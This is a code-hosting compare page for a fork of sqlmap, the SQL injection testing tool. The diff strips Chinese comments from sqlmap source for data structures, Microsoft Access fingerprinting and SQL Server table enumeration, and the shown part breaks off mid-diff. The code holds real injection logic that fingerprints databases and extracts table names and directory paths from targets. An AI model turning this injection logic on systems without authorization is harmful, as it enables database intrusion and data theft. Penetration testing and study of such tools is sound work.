ptnqoxywl
/
sqlmap
1
0
Fork 1
Code Issues Pull Requests 1 Packages Projects Releases Wiki Activity

Compare commits

..

No commits in common. 'main' and 'wangjun_branch' have entirely different histories.
main ... wangjun_br

46 changed files with 3328 additions and 4692 deletions

BIN
doc/sqlmap-泛读报告.docx
View File

Binary file not shown.

207
src/sqlmap-master/lib/core/datatype.py
Unescape View File

@ -5,15 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
import copy # 导入 copy 模块,用于对象复制
import threading # 导入 threading 模块,用于线程同步
import types # 导入 types 模块,用于类型判断
import copy
import threading
import types
from thirdparty.odict import OrderedDict # 导入 thirdparty 中的 OrderedDict 类,用于实现有序字典
from thirdparty.six.moves import collections_abc as _collections # 导入 six 库中的 collections_abc 模块,用于抽象集合类
from thirdparty.odict import OrderedDict
from thirdparty.six.moves import collections_abc as _collections
# 定义 AttribDict 类,继承自 dict允许以属性方式访问字典成员
class AttribDict(dict):
"""
This class defines the dictionary with added capability to access members as attributes
@ -24,20 +22,20 @@ class AttribDict(dict):
1
"""
# 初始化方法,接受一个字典 indict一个属性 attribute 和一个布尔值 keycheck
def __init__(self, indict=None, attribute=None, keycheck=True):
if indict is None: # 如果 indict 为空,初始化为空字典
if indict is None:
indict = {}
# 设置属性,这些属性在初始化前是普通属性
# Set any attributes here - before initialisation
# these remain as normal attributes
self.attribute = attribute
self.keycheck = keycheck
dict.__init__(self, indict) # 调用 dict 的初始化方法
self.__initialised = True # 设置初始化完成标志
dict.__init__(self, indict)
self.__initialised = True
# 在初始化之后,设置属性与设置字典项相同
# After initialisation, setting attributes
# is the same as setting an item
# 定义 __getattr__ 方法,用于获取属性
def __getattr__(self, item):
"""
Maps values to attributes
@ -45,95 +43,89 @@ class AttribDict(dict):
"""
try:
return self.__getitem__(item) # 尝试获取字典项
except KeyError: # 如果字典中不存在此键
if self.keycheck: # 如果 keycheck 为 True
raise AttributeError("unable to access item '%s'" % item) # 抛出属性错误
else: # 如果 keycheck 为 False
return None # 返回 None
# 定义 __delattr__ 方法,用于删除属性
return self.__getitem__(item)
except KeyError:
if self.keycheck:
raise AttributeError("unable to access item '%s'" % item)
else:
return None
def __delattr__(self, item):
"""
Deletes attributes
"""
try:
return self.pop(item) # 尝试从字典中删除项
except KeyError: # 如果字典中不存在此键
if self.keycheck: # 如果 keycheck 为 True
raise AttributeError("unable to access item '%s'" % item) # 抛出属性错误
else: # 如果 keycheck 为 False
return None # 返回 None
# 定义 __setattr__ 方法,用于设置属性
return self.pop(item)
except KeyError:
if self.keycheck:
raise AttributeError("unable to access item '%s'" % item)
else:
return None
def __setattr__(self, item, value):
"""
Maps attributes to values
Only if we are initialised
"""
# 在初始化方法中允许设置属性
# This test allows attributes to be set in the __init__ method
if "_AttribDict__initialised" not in self.__dict__:
return dict.__setattr__(self, item, value)
# 正常处理普通属性
# Any normal attributes are handled normally
elif item in self.__dict__:
dict.__setattr__(self, item, value)
else: # 其他情况,将属性映射到字典项
else:
self.__setitem__(item, value)
# 定义 __getstate__ 方法,用于支持序列化
def __getstate__(self):
return self.__dict__
# 定义 __setstate__ 方法,用于支持反序列化
def __setstate__(self, dict):
self.__dict__ = dict
# 定义 __deepcopy__ 方法,用于深拷贝
def __deepcopy__(self, memo):
retVal = self.__class__() # 创建一个新实例
memo[id(self)] = retVal # 将新实例添加到 memo 中
retVal = self.__class__()
memo[id(self)] = retVal
for attr in dir(self): # 遍历所有属性
if not attr.startswith('_'): # 忽略私有属性
value = getattr(self, attr) # 获取属性值
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): # 忽略内置函数、函数和方法
setattr(retVal, attr, copy.deepcopy(value, memo)) # 深拷贝属性值
for attr in dir(self):
if not attr.startswith('_'):
value = getattr(self, attr)
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
setattr(retVal, attr, copy.deepcopy(value, memo))
for key, value in self.items(): # 遍历所有字典项
retVal.__setitem__(key, copy.deepcopy(value, memo)) # 深拷贝字典项
for key, value in self.items():
retVal.__setitem__(key, copy.deepcopy(value, memo))
return retVal # 返回深拷贝后的实例
return retVal
# 定义 InjectionDict 类,继承自 AttribDict用于存储注入相关信息
class InjectionDict(AttribDict):
def __init__(self):
AttribDict.__init__(self) # 调用 AttribDict 的初始化方法
# 初始化注入信息
self.place = None # 注入位置
self.parameter = None # 注入参数
self.ptype = None # 参数类型
self.prefix = None # 前缀
self.suffix = None # 后缀
self.clause = None # 子句
self.notes = [] # 备注列表
# data 字典存储不同类型的注入数据
AttribDict.__init__(self)
self.place = None
self.parameter = None
self.ptype = None
self.prefix = None
self.suffix = None
self.clause = None
self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888
# data is a dict with various stype, each which is a dict with
# all the information specific for that stype
self.data = AttribDict()
# conf 字典存储检测期间使用的重要选项的快照
# conf is a dict which stores current snapshot of important
# options used during detection
self.conf = AttribDict()
self.dbms = None # 数据库类型
self.dbms_version = None # 数据库版本
self.os = None # 操作系统
self.dbms = None
self.dbms_version = None
self.os = None
# 定义 LRUDict 类,实现 LRU 缓存字典
# 参考https://www.kunxi.org/2014/05/lru-cache-in-python
# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python
class LRUDict(object):
"""
This class defines the LRU dictionary
@ -149,41 +141,40 @@ class LRUDict(object):
"""
def __init__(self, capacity):
self.capacity = capacity # 设置缓存容量
self.cache = OrderedDict() # 使用 OrderedDict 作为缓存
self.__lock = threading.Lock() # 创建一个锁,用于线程同步
self.capacity = capacity
self.cache = OrderedDict()
self.__lock = threading.Lock()
def __len__(self):
return len(self.cache) # 返回缓存长度
return len(self.cache)
def __contains__(self, key):
return key in self.cache # 判断键是否存在于缓存中
return key in self.cache
def __getitem__(self, key):
value = self.cache.pop(key) # 将键从缓存中移除
self.cache[key] = value # 将键添加回缓存,移动到最后
return value # 返回键的值
value = self.cache.pop(key)
self.cache[key] = value
return value
def get(self, key):
return self.__getitem__(key) # 获取键的值
return self.__getitem__(key)
def __setitem__(self, key, value):
with self.__lock: # 获取锁,保证线程安全
with self.__lock:
try:
self.cache.pop(key) # 尝试从缓存中删除键
except KeyError: # 如果键不存在
if len(self.cache) >= self.capacity: # 如果缓存已满
self.cache.popitem(last=False) # 删除最老的项
self.cache[key] = value # 将键值添加到缓存中
self.cache.pop(key)
except KeyError:
if len(self.cache) >= self.capacity:
self.cache.popitem(last=False)
self.cache[key] = value
def set(self, key, value):
self.__setitem__(key, value) # 设置键值
self.__setitem__(key, value)
def keys(self):
return self.cache.keys() # 返回缓存的所有键
return self.cache.keys()
# 定义 OrderedSet 类,实现有序集合
# 参考https://code.activestate.com/recipes/576694/
# Reference: https://code.activestate.com/recipes/576694/
class OrderedSet(_collections.MutableSet):
"""
This class defines the set with ordered (as added) items
@ -201,57 +192,57 @@ class OrderedSet(_collections.MutableSet):
"""
def __init__(self, iterable=None):
self.end = end = [] # 创建哨兵节点
end += [None, end, end] # 双向链表的哨兵节点
self.map = {} # 存储键值和链表节点的映射
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable # 添加可迭代对象
self |= iterable
def __len__(self):
return len(self.map) # 返回集合长度
return len(self.map)
def __contains__(self, key):
return key in self.map # 判断键是否存在于集合中
return key in self.map
def add(self, value):
if value not in self.map: # 如果值不在集合中
if value not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[value] = [value, curr, end] # 添加新节点到链表尾部
curr[2] = end[1] = self.map[value] = [value, curr, end]
def discard(self, value):
if value in self.map: # 如果值在集合中
value, prev, next = self.map.pop(value) # 移除节点
prev[2] = next # 更新链表
if value in self.map:
value, prev, next = self.map.pop(value)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.end
curr = end[2] # 从链表头开始遍历
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2] # 移动到下一个节点
curr = curr[2]
def __reversed__(self):
end = self.end
curr = end[1] # 从链表尾开始遍历
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1] # 移动到上一个节点
curr = curr[1]
def pop(self, last=True):
if not self: # 如果集合为空
if not self:
raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0] # 获取最后一个或第一个元素
self.discard(key) # 移除元素
return key # 返回元素值
key = self.end[1][0] if last else self.end[2][0]
self.discard(key)
return key
def __repr__(self):
if not self: # 如果集合为空
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self)) # 返回字符串表示
return '%s(%r)' % (self.__class__.__name__, list(self))
def __eq__(self, other):
if isinstance(other, OrderedSet): # 如果另一个对象是有序集合
return len(self) == len(other) and list(self) == list(other) # 比较长度和内容
return set(self) == set(other) # 比较集合内容
if isinstance(other, OrderedSet):
return len(self) == len(other) and list(self) == list(other)
return set(self) == set(other)

126
src/sqlmap-master/plugins/dbms/access/fingerprint.py
Unescape View File

@ -7,109 +7,94 @@ See the file 'LICENSE' for copying permission
import re
# 1. 从库中引入需要的模块和类
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import Format # 格式化输出
from lib.core.common import getCurrentThreadData # 获取当前线程的数据
from lib.core.common import randomStr # 生成随机字符串
from lib.core.common import wasLastResponseDBMSError # 判断最后响应是否包含数据库错误
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.session import setDbms # 设置当前数据库类型
from lib.core.settings import ACCESS_ALIASES # ACCESS 数据库的别名
from lib.core.settings import METADB_SUFFIX # 元数据表后缀
from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import getCurrentThreadData
from lib.core.common import randomStr
from lib.core.common import wasLastResponseDBMSError
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import METADB_SUFFIX
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self):
GenericFingerprint.__init__(self, DBMS.ACCESS)
# 4. 私有方法,检查是否在沙盒中运行
def _sandBoxCheck(self):
# 参考链接: http://milw0rm.com/papers/198
# Reference: http://milw0rm.com/papers/198
retVal = None
table = None
# 5. 根据 Access 版本设置需要查询的表名
if Backend.isVersionWithin(("97", "2000")):
table = "MSysAccessObjects"
elif Backend.isVersionWithin(("2002-2003", "2007")):
table = "MSysAccessStorage"
# 6. 如果有对应的表名,则执行查询判断是否处于沙盒环境
if table is not None:
result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table)
retVal = "not sandboxed" if result else "sandboxed"
# 7. 返回检测结果
return retVal
# 8. 私有方法,检查系统表是否存在
def _sysTablesCheck(self):
infoMsg = "executing system table(s) existence fingerprint"
logger.info(infoMsg)
# 9. 定义不同版本 Access 需要检查的系统表
# Microsoft Access table reference updated on 01/2010
sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"),
"2000": ("!MSysModules2", "MSysAccessObjects"),
"2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
}
# MSysAccessXML 是不稳定的系统表,因为它并非总是存在
# 10. 遍历系统表,进行检查
# MSysAccessXML is not a reliable system table because it doesn't always exist
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")
for version, tables in sysTables.items():
exist = True
for table in tables:
negate = False
# 11. 如果表名以 ! 开头,表示该表应该不存在
if table[0] == '!':
negate = True
table = table[1:]
# 12. 执行 SQL 查询,检查表是否存在
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table)
if result is None:
result = False
# 13. 如果表不应该存在,则取反
if negate:
result = not result
# 14. 对所有表的结果进行与运算,只有都满足才能认为当前版本匹配
exist &= result
if not exist:
break
# 15. 如果当前版本匹配,则返回版本号
if exist:
return version
# 16. 如果所有版本都不匹配,则返回 None
return None
# 17. 私有方法,获取数据库所在目录
def _getDatabaseDir(self):
retVal = None
infoMsg = "searching for database directory"
logger.info(infoMsg)
# 18. 生成随机字符串
randStr = randomStr()
# 19. 执行 SQL 查询,尝试触发错误,获取数据库目录
inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr))
# 20. 如果最后响应包含数据库错误
if wasLastResponseDBMSError():
threadData = getCurrentThreadData()
# 21. 从错误信息中提取数据库目录
match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1])
if match:
@ -117,115 +102,92 @@ class Fingerprint(GenericFingerprint):
if retVal.endswith('\\'):
retVal = retVal[:-1]
# 22. 返回数据库目录
return retVal
# 23. 获取指纹信息
def getFingerprint(self):
value = ""
# 24. 获取 Web 服务器操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp)
# 25. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp:
value += "%s\
" % wsOsFp
value += "%s\n" % wsOsFp
# 26. 如果有数据库 Banner 信息
if kb.data.banner:
# 27. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 28. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp:
value += "%s\
" % dbmsOsFp
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
# 29. 如果不是详细指纹,则返回数据库类型
if not conf.extensiveFp:
value += DBMS.ACCESS
return value
# 30. 获取活动的指纹信息
actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck())
blank = " " * 15
value += "active fingerprint: %s" % actVer
# 31. 如果有 Banner 解析指纹
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
# 32. 如果有 Banner 版本号
if banVer:
# 33. 如果 Banner 信息包含 -log则表示启用日志
if re.search(r"-log$", kb.data.banner or ""):
banVer += ", logging enabled"
# 34. 格式化 Banner 版本号
banVer = Format.getDbms([banVer])
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
# 35. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes()
# 36. 将 HTML 错误指纹添加到输出
if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
# 37. 获取数据库目录并添加到输出
value += "\
database directory: '%s'" % self._getDatabaseDir()
# 38. 返回完整的指纹信息
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\ndatabase directory: '%s'" % self._getDatabaseDir()
return value
# 39. 检查数据库类型是否为 Access
def checkDbms(self):
# 40. 如果不是详细指纹,且当前数据库类型属于 Access 别名,则设置数据库类型为 Access 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES):
setDbms(DBMS.ACCESS)
return True
# 41. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.ACCESS
logger.info(infoMsg)
# 42. 执行 SQL 查询,检查数据库类型是否为 Access
result = inject.checkBooleanExpression("VAL(CVAR(1))=1")
# 43. 如果查询成功
if result:
infoMsg = "confirming %s" % DBMS.ACCESS
logger.info(infoMsg)
# 44. 执行 SQL 查询,再次确认数据库类型是否为 Access
result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
# 45. 如果再次确认失败,则输出警告信息,并返回 False
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warning(warnMsg)
return False
# 46. 设置数据库类型为 Access
setDbms(DBMS.ACCESS)
# 47. 如果不是详细指纹,则返回 True
if not conf.extensiveFp:
return True
# 48. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.ACCESS
logger.info(infoMsg)
# 49. 执行系统表检查,获取 Access 版本
version = self._sysTablesCheck()
# 50. 如果获取到版本信息,则设置数据库版本
if version is not None:
Backend.setVersion(version)
# 51. 返回 True
return True
# 52. 如果第一次查询失败,则输出警告信息,并返回 False
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warning(warnMsg)
return False
# 53. 强制枚举数据库类型
def forceDbmsEnum(self):
# 54. 设置数据库名称
conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_')
conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_')

255
src/sqlmap-master/plugins/dbms/mssqlserver/enumeration.py
Unescape View File

@ -5,50 +5,45 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
import re # 导入正则表达式模块,用于进行模式匹配
from lib.core.agent import agent # 导入 agent 模块,用于执行 SQL 注入
from lib.core.common import arrayizeValue # 导入 arrayizeValue 函数,用于将值转换为列表
from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isInferenceAvailable # 导入 isInferenceAvailable 函数,用于检查是否可以使用推断注入
from lib.core.common import isNoneValue # 导入 isNoneValue 函数,用于检查值是否为 None
from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import safeSQLIdentificatorNaming # 导入 safeSQLIdentificatorNaming 函数,用于安全地命名 SQL 标识符
from lib.core.common import safeStringFormat # 导入 safeStringFormat 函数,用于安全地格式化字符串
from lib.core.common import singleTimeLogMessage # 导入 singleTimeLogMessage 函数,用于只输出一次的日志消息
from lib.core.common import unArrayizeValue # 导入 unArrayizeValue 函数,用于从列表中提取值
from lib.core.common import unsafeSQLIdentificatorNaming # 导入 unsafeSQLIdentificatorNaming 函数,用于不安全地命名 SQL 标识符
from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.data import queries # 导入 queries 对象,用于获取预定义的 SQL 查询语句
from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.core.settings import CURRENT_DB # 导入 CURRENT_DB 常量,表示当前数据库
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.enumeration import Enumeration as GenericEnumeration # 导入 GenericEnumeration 类,作为当前类的父类
from thirdparty import six # 导入 six 模块,用于兼容 Python 2 和 3
# 定义 Enumeration 类,继承自 GenericEnumeration
import re
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import getLimitRange
from lib.core.common import isInferenceAvailable
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import safeSQLIdentificatorNaming
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeLogMessage
from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_DB
from lib.request import inject
from plugins.generic.enumeration import Enumeration as GenericEnumeration
from thirdparty import six
class Enumeration(GenericEnumeration):
# 定义 getPrivileges 方法,用于获取数据库用户的权限
def getPrivileges(self, *args, **kwargs):
# 输出警告信息,说明在 Microsoft SQL Server 上无法获取用户权限,只会检查是否是 DBA
warnMsg = "on Microsoft SQL Server it is not possible to fetch "
warnMsg += "database users privileges, sqlmap will check whether "
warnMsg += "or not the database users are database administrators"
logger.warning(warnMsg)
users = [] # 初始化用户列表
areAdmins = set() # 初始化管理员集合
users = []
areAdmins = set()
# 如果配置中指定了用户,则使用该用户,否则获取所有用户
if conf.user:
users = [conf.user]
elif not len(kb.data.cachedUsers):
@ -56,114 +51,91 @@ class Enumeration(GenericEnumeration):
else:
users = kb.data.cachedUsers
# 遍历用户列表
for user in users:
user = unArrayizeValue(user) # 从列表中提取用户
user = unArrayizeValue(user)
if user is None: # 如果用户为 None则跳过
if user is None:
continue
isDba = self.isDba(user) # 检查用户是否为 DBA
isDba = self.isDba(user)
if isDba is True: # 如果是 DBA则添加到管理员集合
if isDba is True:
areAdmins.add(user)
kb.data.cachedUsersPrivileges[user] = None # 设置用户的权限信息为 None
kb.data.cachedUsersPrivileges[user] = None
# 返回用户的权限信息和管理员集合
return (kb.data.cachedUsersPrivileges, areAdmins)
# 定义 getTables 方法,用于获取数据库表
def getTables(self):
# 如果知识库中已缓存表信息,则直接返回
if len(kb.data.cachedTables) > 0:
return kb.data.cachedTables
self.forceDbmsEnum() # 强制执行 DBMS 枚举
self.forceDbmsEnum()
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db:
dbs = conf.db.split(',')
else:
dbs = self.getDbs()
# 对每个数据库名进行安全命名
for db in dbs:
dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)
# 移除空字符串的数据库
dbs = [_ for _ in dbs if _]
# 输出获取表信息的提示信息
infoMsg = "fetching tables for database"
infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))
logger.info(infoMsg)
# 获取 SQL Server 的表查询语句
rootQuery = queries[DBMS.MSSQL].tables
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 遍历数据库列表
for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 尝试使用不同的查询语句获取表信息
for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3):
query = query.replace("%s", db)
value = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
if not isNoneValue(value): # 如果结果不为 None则跳出循环
value = inject.getValue(query, blind=False, time=False)
if not isNoneValue(value):
break
# 如果获取到了表信息,则进行处理
if not isNoneValue(value):
value = [_ for _ in arrayizeValue(value) if _] # 将结果转换为列表
value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] # 安全命名表名
kb.data.cachedTables[db] = value # 将表信息缓存到知识库
value = [_ for _ in arrayizeValue(value) if _]
value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value]
kb.data.cachedTables[db] = value
# 如果没有获取到表信息,并且可以使用推断注入,则使用推断注入获取表信息
if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:
# 遍历数据库列表
for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 输出获取表数量的提示信息
infoMsg = "fetching number of tables for "
infoMsg += "database '%s'" % db
logger.info(infoMsg)
# 尝试使用不同的查询语句获取表数量
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
_ = query.replace("%s", db)
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
if not isNoneValue(count): # 如果结果不为 None则跳出循环
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNoneValue(count):
break
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count):
if count != 0:
warnMsg = "unable to retrieve the number of "
@ -171,18 +143,17 @@ class Enumeration(GenericEnumeration):
logger.warning(warnMsg)
continue
tables = [] # 初始化表列表
tables = []
# 遍历表索引,获取每个表名
for index in xrange(int(count)):
_ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)
table = inject.getValue(_, union=False, error=False) # 执行推断注入并获取结果
if not isNoneValue(table): # 如果结果不为 None则添加到表列表
table = inject.getValue(_, union=False, error=False)
if not isNoneValue(table):
kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) # 安全命名表名
table = safeSQLIdentificatorNaming(table, True)
tables.append(table)
# 如果获取到了表信息,则进行缓存,否则输出警告信息
if tables:
kb.data.cachedTables[db] = tables
else:
@ -190,31 +161,25 @@ class Enumeration(GenericEnumeration):
warnMsg += "for database '%s'" % db
logger.warning(warnMsg)
# 如果没有获取到表信息,并且没有指定搜索,则抛出异常
if not kb.data.cachedTables and not conf.search:
errMsg = "unable to retrieve the tables for any database"
raise SqlmapNoneDataException(errMsg)
else:
# 对缓存的表名进行排序
for db, tables in kb.data.cachedTables.items():
kb.data.cachedTables[db] = sorted(tables) if tables else tables
# 返回缓存的表信息
return kb.data.cachedTables
# 定义 searchTable 方法,用于搜索指定的表
def searchTable(self):
foundTbls = {} # 初始化找到的表字典
tblList = conf.tbl.split(',') # 获取要搜索的表列表
rootQuery = queries[DBMS.MSSQL].search_table # 获取 SQL Server 的表搜索查询语句
tblCond = rootQuery.inband.condition # 获取表搜索条件
tblConsider, tblCondParam = self.likeOrExact("table") # 获取表搜索的方式 (LIKE 或 EXACT)
foundTbls = {}
tblList = conf.tbl.split(',')
rootQuery = queries[DBMS.MSSQL].search_table
tblCond = rootQuery.inband.condition
tblConsider, tblCondParam = self.likeOrExact("table")
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db:
enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs):
@ -222,48 +187,40 @@ class Enumeration(GenericEnumeration):
else:
enumDbs = kb.data.cachedDbs
# 初始化每个数据库的表搜索结果
for db in enumDbs:
db = safeSQLIdentificatorNaming(db)
foundTbls[db] = []
# 遍历要搜索的表列表
for tbl in tblList:
tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
tbl = safeSQLIdentificatorNaming(tbl, True)
# 输出搜索表信息的提示信息
infoMsg = "searching table"
if tblConsider == "1":
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg)
# 构建表搜索查询条件
tblQuery = "%s%s" % (tblCond, tblCondParam)
tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl)
# 遍历数据库列表
for db in foundTbls.keys():
db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
db = safeSQLIdentificatorNaming(db)
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query.replace("%s", db)
query += tblQuery
values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了表信息,则进行处理
values = inject.getValue(query, blind=False, time=False)
if not isNoneValue(values):
if isinstance(values, six.string_types):
values = [values]
@ -273,9 +230,7 @@ class Enumeration(GenericEnumeration):
continue
foundTbls[db].append(foundTbl)
# 如果无法使用上述注入,则使用推断注入搜索表信息
else:
# 输出获取表数量的提示信息
infoMsg = "fetching number of table"
if tblConsider == "1":
infoMsg += "s LIKE"
@ -285,8 +240,8 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count
query = query.replace("%s", db)
query += " AND %s" % tblQuery
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
warnMsg = "no table"
if tblConsider == "1":
@ -297,57 +252,50 @@ class Enumeration(GenericEnumeration):
